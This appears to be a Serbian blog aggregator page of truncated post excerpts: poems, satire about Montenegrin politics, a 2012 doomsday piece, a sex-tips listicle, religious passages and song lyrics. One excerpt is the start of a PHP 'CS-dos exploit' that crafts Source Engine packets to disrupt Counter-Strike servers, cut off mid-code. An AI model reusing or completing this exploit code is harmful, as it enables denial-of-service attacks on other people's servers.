Blogovi

Ako je život sveska u kojoj se piše svakoga dana po jedna strana, na kraju života ćemo imati jednu lepu knjigu. Ja rešio da iz svoje sveske iscepam sve loše strane, znate šta mi je ostalo...samo korice, odnosno rođenje i smrt. U životu se jedino sećam svojih gluposti, i zaista nije mi krivo, sve ostalo je bezveze, gotovo i da se nesećam čega je bilo normalno. Kristijan
I Zatičem te Svežu svakog jutra za stolom kako pišeš Osluškujem te U bujici prvih postoktobarskih grcaja umetnosti Vidim te U godinama koje si obeležila svojim stihom Zapažam te Na kišom opranim prozorskim oknima Primećujem te Među ljude koji su bili gordi i čvrsti pod udarcima Znam te Svake večeri zapljuskuje me plima tvog prisustva Govoriš mi Olujnim letnjim bojama razbesnelog neba II Mislio sam o tebi kao o zagubljenom detetu Nisam ni znao da nailaziš Na zagrižene poglede ljudi i oštre nokte žena Na prepečen hleb i gorku vodu Ti poslednji odani tragaču Umetnosti Poznavateljko belih soba tuđih sudbina Nespretna sa zamkama koje donosi život Penješ se stepenicama trnja u budućnost Pretvarala...
Pre neko veče, uhvatim sebe da gledam TV, inače to retko radim ali…na udarnom dnevniku ( II dnevnik RTS-a) procurela informacija da Ameri prave sklonište za sudnji dan.!?!? E vala svašta se čovek nasluša na toj televiziji, ali za ovu 2012 godinu, tačnije 21-12-2012 godine kada se planira da će se desiti smak sveta, počeli su da baljezgaju na svim kanalima i udarnim vestima. Sledećeg jutra na poslu, od kolega čujem raznorazne priče vezane za 2012 g. Ljudi su zamišljeni, niko i ne pominje svakodnevne probleme. Neko je pročitao ovo, drugi je čuo ono. Kalendar Maja, proročanstvo Inka, Acteka...Neko od kolega objašnjava apokalipsu na naučnoj osnovi, mada im to nije struka i jako dobro znaju tuđe poslove i sva je sreća što svoje nerade...
De Sadu Ujutru je najteže Moram poludeti da bih preživeo Niko te ne pita o težini dana Može li se izdržati Kako svom umu objasniti Kakafoniju glasova sapatnika Vezivanje slobodnog uma za utamničeni Jer mnogi ne shvataju korak Koji sam učinio u vivisekciji strasti U razotkrivanju telesnih žudnji Istraživati o mogućnosti upotrebe Sprava za istezanje i zatezanje Kožnim kaiševima i korbačima O belim rukavicama i čistim noktima Na više desetina svakodnevnih načina Traktat o bolu Traktat o ekstazi Zakon o upotrebi raznih pomagala U posebnim ustanovama za zbrinavanje Onih kiji su krenuli putem onostranog Ka enigmi nebeskog koda stvaranja I ko je najbliži Bogu Vi ili oni koju su kao i ja Zakoračili u zaključane odaje duše
10 načina da odvučete ženu u krevet
Svaka žena ima neki tajni ’okidač’ koji je istog trenutka čini raspoloženom za seks. Deset žena je otkrilo šta je to što uvek i bez greške ’upali’ i zbog čega je svaka od njih spremna da odmah ode sa vama u krevet. 1. Izgovorite prave reči ’Reci mi da sam lepa. Reci mi da sam seksi. Reci mi da sam neverovatna. I onda postajem laka’ – Kimberli 2. Ugrizite je ’Dosta mi je fetiša sa puštanjem krvi. Jednostavno me zgrabi za kosu i ugrizi me za vrat’ – Džen 3. Obratite pažnju na usne ’Mora dobro da se ljubi i to je jednostavno tako. Prilično sam probirljiva oko toga kome ću dozvoliti da mi gurne jezik u grlo, a kada dođe do toga, postoje samo dve stvari preko kojih ne mogu da pređem – tip koji mi balavi po faci ili ima zadah’ – Li 4...
Sto li mi brinemo za odliv pameti? Pa mi smo zemlja sa najvise akademija na svetu koje traju i po godinu dana, a neke cak par meseci. Akademija za nadogradnju noktiju, akademija za produzivanje kose, akademija za buduce dame, za stajling, look, book, akademija za pogacice sa cvarcima, akademija za spajanje papira i to dva smera - heftalica i spajalica...ko ce sve to napisati, nabrojati, a tek ko ce citati. Ccc Ovom prilikom obavestavam sve neupucene, a zainteresovane da je u Bg otvorena prva akademija za njishtanje - Sarac, sa jednim, ali vredim smerom - Krilati Jabucilo. Po zavrsetku akademije dobijate diplomu "Samostalni menadzer za njishtanje". S tom diplomom mozete slobodno da uzletite, tacnije njishtite u javnom prevozu, u...
Velika prednost Crne Gore je u tome što ima monetu euro, jer su mnoge, sada već članice Evropske unije imale ozbiljnih problema upravo zbog promjene valute. Druga njena velika prednost je ulazak u Mediteransku uniju koji će joj olakšati put ka Evropi, kaže za Pobjedu professor Aloha Podgorica, 20. maja - Veoma je važno da Crna Gora period do septembra 2010. godine, do kada će trajati globalna finansijska kriza, iskoristi što bolje reformišući unutrašnji sistem i ulažući maksimnalne napore u dostizanju evropskih standarda. Tako će kraj naredne godine dočekati spremna za dalje integracije u EU, kaže za "Pobjedu" predsjednik španske Kraljevske akademije ekonomskih nauka i finansija prof. dr Hajme Hil Aloha. On naglašava da sada nije...
Budim se poslije dugog i košmarnog sna, iz kojeg se ne sjećam nijednog detalja. Shvatam da ležim u bolnici. Ne vidim sebe, ali osjećam da sam starac. Što je bilo samnom, kako sam dospio ovdje? Bolnička soba je sva oronula, smrdi. Što od mene, što od, vidi se, totalne zapuštenosti. Televizor je u sobi. Uključen. Vidim poznat ženski lik. Uskokoćen i drčan. Nekako mi je poznat. Čudi me da tako stara žena vodi dnevnik. Zar je ovo Biljana? - pitam sebe. Koliko dugo sam bio ovdje kada je ona ovako ostarjela, ako je to ona? Hvata me strah a ne mogu izustiti riječ, valjda mi se oduzela moć govora. Počinje dnevnik: Dobro veče dragi gledaoci. Crna Gora ubrzano napreduje na putu evroatlanskih integracija. Uskoro će se razmatrati naš...
Premijer Dukanović, po mnogima najveći sin naših naroda i narodnosti, najavio je mogućnost odlaska iz politike. Jednom kada je otišao, na kratko srećom, nacija je pala u depresiju. Ne ekonomsku, nego onu iz glave što dolazi . Pametni su vapili „Primuse vrati se". Oni malo manje pametni su se pitali „Kako ćemo sad, bez njega?". Tad čuh jedan radio komentar-uvodnik, našeg najboljeg i najprofesionalnijeg novinara povodom njegovog odlaska. I ukočih se. Od tuge. A tek kada mu se javiše slušaoci. Kakav je to bol tj. neprebol bio. Toliko „plača" za premijerom, kao da je ne daj Bože umro. Bilo je i takvih komentara-komentara, da je isti najbolji u istoriji crnogorskog novinarstva. I šire, dodah tada u sebi. Ne mogah u program uživo. Od tuge...
<?php /* CS-dos exploit made by gemaglabin Bug was discovered by .FUF # 111596 Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su underwater.cup.su */ ini_set("display_errors","0"); function HELLO_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "TSource Engine Query"; $packet .= pack("H*","00"); return $packet; } function CHALLENGE_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "getchallenge valve"; $packet .= pack("H*","00"); return $packet; } function LOGIN_PACKET_4() { global $cookie; global $password; $packet = pack("H*","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .=...
Približava se svetsko prvenstvo u fudbalu. Jako mi je žao da rusi nisu se kvalifikovali. Ali to je fer; jer kad jedan Hiddink dobije više novca nego svi slovenski fudbaleri i treneri iz reprezentacije — i rusi ne pobeđivaju, to je dijagnoza za ruski fudbal i ceo sistem. Ne može sve da pare kupe. Ali jako sam sretan da orlovi lete u Južnu Afriku. Svaka čast Srbima. U protivnom slučaju ne bi preostalo ništa drugo nego pratiti za brazilcima, jer oduvek reprezentacija Brazila je bio omiljeni tim u Rusiji. A to već nije baš interesantno. Takođe reprezentacija Severne Koreje izaziva veliki interes. To je zemlja-tajna, zemlja-zagonetka.)) Nadam se da Srbija imaće veliku sreću na ovom prvenstvu. Žao mi je da nisam video kako igra Srpska...
Tri su samo u stvari Muze iznad jezera Grčkog ponikle, a konji tim predelima su tek kasnije došli, dok zmajeva par je jedan bio On beo, ona zlatna runa bi čuvali, a ljudi se tome čudili. Melete, Mneme, Aeode znam da ste u podrumu skriveni od okupatora danas plaši vas svako muško sam bradom A krive vas da ste napravili Hitlera! Nec'e vam dnevnike Ane objavljivati, niti videti cvet orhideje koje sitnim vezom živom slikom podancima šijetie kao kineski zid neki a greška odliva sirovom naftom obale gde vam se sestra Maja, rodila Ona beše i smrt i lepota večna, dok to ne primetiše utvare spisa i tajni piramida a grkljan joj beše pričest zadnjem poglavici i bez vaše pomoc'i to carstvo brzo nestade. Ajde, biće te slobodne kada papak...
Jimmy Nolen - Americhki gitarista 60-tih. Bio u prvoj grupi sa machkom James Brownom koju je taj isti otpustio u svojoj karjeri. Ovo je jedino shto sam nashao sa njegovog solo albuma pod nazivom "Pre Fanka" koji je Jimmy snimao. Smatram da je bolji od samog Jimmy Hendrixa, koji je doshao kasnije i stradao od herojina.
Prošao je i taj dan, mome sinu rođendan. Dani pre rođendana su obilovali raznim iznenađenjima tako da ću Nikolin 13. rođendan dugo pamtiti. Hvala Bogu sve je prošlo u savršenom redu danas, a to mogu da zahvalim dobroj deci koja su tu bila. Mislim da je ovaj dan bio uvod u jedan novi period lepih događaja koji bi trebalo da se odvijaju od sutra jer sam napokon u situaciji da uzmem neku lovu od moje najveće profesionalne ljubavi - komedije. O tome neki drugi put, sada idem na spavanje jer ustajem rano i putujem za Beograd da obavim neke posliće. Prijateljima i svim dobrim ljudima laku noć želi vaš virtuelni drugar - NesaDeBeli.:bye::bye::bye::bye:
поуке
] Јарам је Мој благ и бреме је Моје лако (Мт. 11, 30) Бог је љубав, и који пребива у љубави, у Богу пребива и Бог у њему 1 Јн. 4:16 Ако језике човјечије и анђеоске говорим, а љубави немам, онда сам као звоно које јечи, или кимвал који звечи. И ако имам дар пророштва и знам све тајне и све знање, и ако имам сву вјеру да и горе премјештам, а љубави немам, ништа сам. И ако раздам све имање своје, и ако предам тијело своје да се сажеже, а љубави немам, ништа ми не користи. Љубав дуго трпи, благотворна је, љубав не завиди, љубав се не горди, не надима се, Не чини што не пристоји, не тражи своје, не раздражује се, не мисли о злу, Не радује се неправди, а радује се истини, Све сноси, све вјерује, свему се нада, све трпи. Љубав никад не...
TUZNA PRICA
Djevojka i momak se voze na motoru... DJEVOJKA: "Nemoj tako brzo voziti, smanji..." MOMAK: "Ne, bas nam je dobro." DJEVOJKA: "Nije mi dobro, molim te..." MOMAK: "Kazi mi da me volis..." DJEVOJKA: "Volim te i ti to znas." MOMAK: "Zagrli me..." (djevojka zagrli momka) MOMAK: "Skini mi kacigu sa moje glave i stavi sebi na glavu, molim te..." SLIJEDECE JUTRO U NOVINAMA: "Motor je imao saobracajnu nesrecu, jer su otkazale kocnice. Na motoru su bile dvije osobe. Jedna je poginula, a jedna prezivjela..." A PRAVA ISTINA JE: Momak je na pola puta shvatio da su kocnice otkazale, ali nije zelio da kaze djevojci. Zelio je posljednji put od nje cuti rijeci VOLIM TE, i posljednji put osjetiti njen zagrljaj. Zatim joj je rekao da stavi njegovu...
U NARUCJU BOGA Jedne noci,jedan covek je usnio cudan san. Sanjao je da hoda peskovitom plazom sa svojim Bogom. Preko neba,poput kaleidoskopa,vrtele su se slike iz njegovog zivota. Uz svaku od slika video je i dva para otisaka stopala u pesku. Bio je svestan da je jedan par pripadao njemu,a drugi samom Bogu.. Kada mu je i zadnja slika zivota bljesnula pred ocima,pogledao je,jos jednom,unatrag na otiske. Pazljivo je pratio da li ih ima na svakoj od slika.. Primetio je da mu je mnogo puta na stazi bio samo jedan par otisaka stopala.. To se nije dogadjalo bas slucajno..naprotiv - u najtezim i najgorim trenucima njegovog zivota primetio je samo jedan par otisaka.. Videvsi to,pozeleo je da upita Boga za objasnjenje: "Boze,Ti si mi obecao...
BOJE DUGE
Dal da se ne dam Il da se predam? Dal da me pojede Sivilo sivo, Il da mi srce Ostane zivo? Tako mi cesto Bude krivo, Zasto je sve Oko mene sivo? Zar nisu lepse Boje duge? One nemaju Nimalo tuge... I nema ovde Bas mnogo mudrosti, Zna se sta su Zivotne radosti! O ljubavi sanjam Bas svaki dan, I zato mi je zivot Najlepsi san!:heart::heart::heart:
Život teče u laganom ritmu, tamburaši to najbolje prate Topot konja sa osmehom žena, češto noću u moj život svrate Kad se sitim pisme od nedavna, uhvati me neka čudna seta Pa mi često na um padnu riči, Ne mogu se točno setit' leta Krenuli smo svak na svoju stranu, ne živi se više k'o nekada Čini mi se sudbina me steže, pa se neću vratiti nikada Ostavit' ću grobove i didu, i sve pisme što su znali svirci I sve nane, čizme i salaše, i sva žita u mojoj ravnici I sve nane, čizme i salaše, i mrkove u mojoj ravnici Dunavom će možda plovit lađe, tamo-amo kako se 'ko snađe A ja ću negde gledat u daljinu, i sve više tražiti tišinu
Мудрост што је са тргова дозивала луде од света покрила је своја уста, занемела пред садукејским доказивањем њеног постојања, сакривши се у селима гадаринским где је нико тражити неће, остављајући пробуђене своје да је фењером траже и не налазе тамо где би морала бити, загледане у небо што се савија као свитак, да би се откриле тајне скривене у срцу.
Kao po obicaju jutro me uvek zatekne samog, pobeglog od nekih snova... I kao i uvek, nisi tu, a krijes se u svakom delicu mojih misli. Zazmurim tada. Jos jednom, onako na kvarno da ukradem jos komad od sna i setim se onih jutara koja ce tek doci. U kojima smo tu, spavamo zagrljeni kao macici i nedelja je i mozemo da se razvlacimo koliko god nam padne na pamet... Kazem da se setim jutara koja ce tek doci... Prosto, lako... jer nasa ljubav to moze. Volim te... Zbog osmeha, zaljulja mi se ceo svet kad mi se nasmejes i svuda okolo iskacu neki sareni baloni. ... Zbog toga sto mi dajes snagu i kad nisi tu, kad nam zivot na sav glas vice da smo daleko, razdvojeni. Samo ga pogledam u lice i nasmejem se i pogled mi odluta kroz njega, setim se...
Алекса Шантић Остајте овдје Остајте овдје!.. Сунце туђег неба Неће вас гријат ко што ово грије; Грки су тамо залогаји хљеба Гдје свога нема и гдје брата није. Од своје мајке ко ће наћи бољу?! А мајка ваша земља вам је ова; Баците поглед по кршу и пољу, Свуда су гробља ваших прадједова. За ову земљу они беху диви, Узори свијетли, што је бранит знаше, У овој земљи останите и ви, И за њу дајте врело крви ваше. Ко пуста грана, кад јесења крила Тргну јој лисје и покосе ледом, Без вас би мајка домовина била; А мајка плаче за својијем чедом. Не дајте сузи да јој с ока лети, Врат'те се њојзи у наручја света; Живите зато да можете мријети На њемом пољу гдје вас слава срета! Овде вас свако познаје и воли, А тамо нико познати вас неће; Бољи...
Moravsko predvecerje
Jedna lepa pesma za laku noc:) Noc silazi niz grane borove svici pale sela i sorove sumi reka kroz guste vrbake kroz vrbake i kroz povrtnjake Kasnim zrakom sunce polja ljubi vodenice na Moravi gubi Slavuj goru svojom pesmom poje pokraj reke sve dvoje i dvoje Huci naper stare vodenice i cuje se pesma medenice suton suncu smice sjaj i boje skriva mene samnom zlato moje Predvecerje zvuk frule razleze Morava me uspomenom veze Dvojnicama i poljanom rodnom sa sviralom i pesmom narodnom Oj, Moravo, pesmo preodavna za cas tiha, za cas vodo plavna svatove si mnoge prevozila izvor vodom bistrom napojila Volim tvoje skele, camce male mesec, zvezde kad ti noc zapale Na obali kolibe sto stoje tu ostase uspomene moje tekstopisac: Obren...
Sve je pocelo jedne noci.... gledala sam neke slike na google images-u kada vidim - to prelepo kuce bele i duge dlake sa ocima crnim kao u crne bisere, pogledom milim i toplim... htedoh da saznam koja je to rasa? Kada sam saznala htela sam da imam jedno takvo, to nije bio samo hir, to je bila jedna ljubav... na prvi pogled prema zivotinjama i toj rasi - maltezeru, i tako sam se uclanila na ovaj forum, prvo sam bila na mackama, a onda sam pisala i na drugim temama, kad jednom primetim - tema "o svemu po malo" udjem tu i imam sta da vidim - druzenje i zabava, uklopih se nekako, ali sada - oni su i vise od slova i smajlija - oni su istinski prijatelji. Sada imam i to kuce, koje obozavam, ali nisam dobila samo kuce, dobila sam nesto o cemu...
TEBI
Budući da volim Tebe (volim Te, dakle, ti koja teško shvataš, i kao što more voli sićušan oblutak na svom dnu, upravo tako i moja ljubav preplavljuje tebe - pa neka sam opet kod Tebe oblutak ako to nebesa dopuštaju), volim i celi svet kojem pripadaš i Tvoje levo rame, ne, najpre je bilo desno i zato ga ljubim kada mi se prohte (i kad si Ti toliko dobra da smakneš bluzu s njega), i kojem pripada i levo rame, i Tvoje lice nadamnom u šumi, i mirovanje na Tvojim gotovo obnaženim grudima. I zato imaš pravo kad kažeš da smo već bili jedno, i ja se uopšte toga ne bojim, štaviše, to je moja jedina sreća i moj jedini ponos, i ja to nipošto ne ograničujem na šumu. - iz "pisama Mileni" - F.Kafka
Back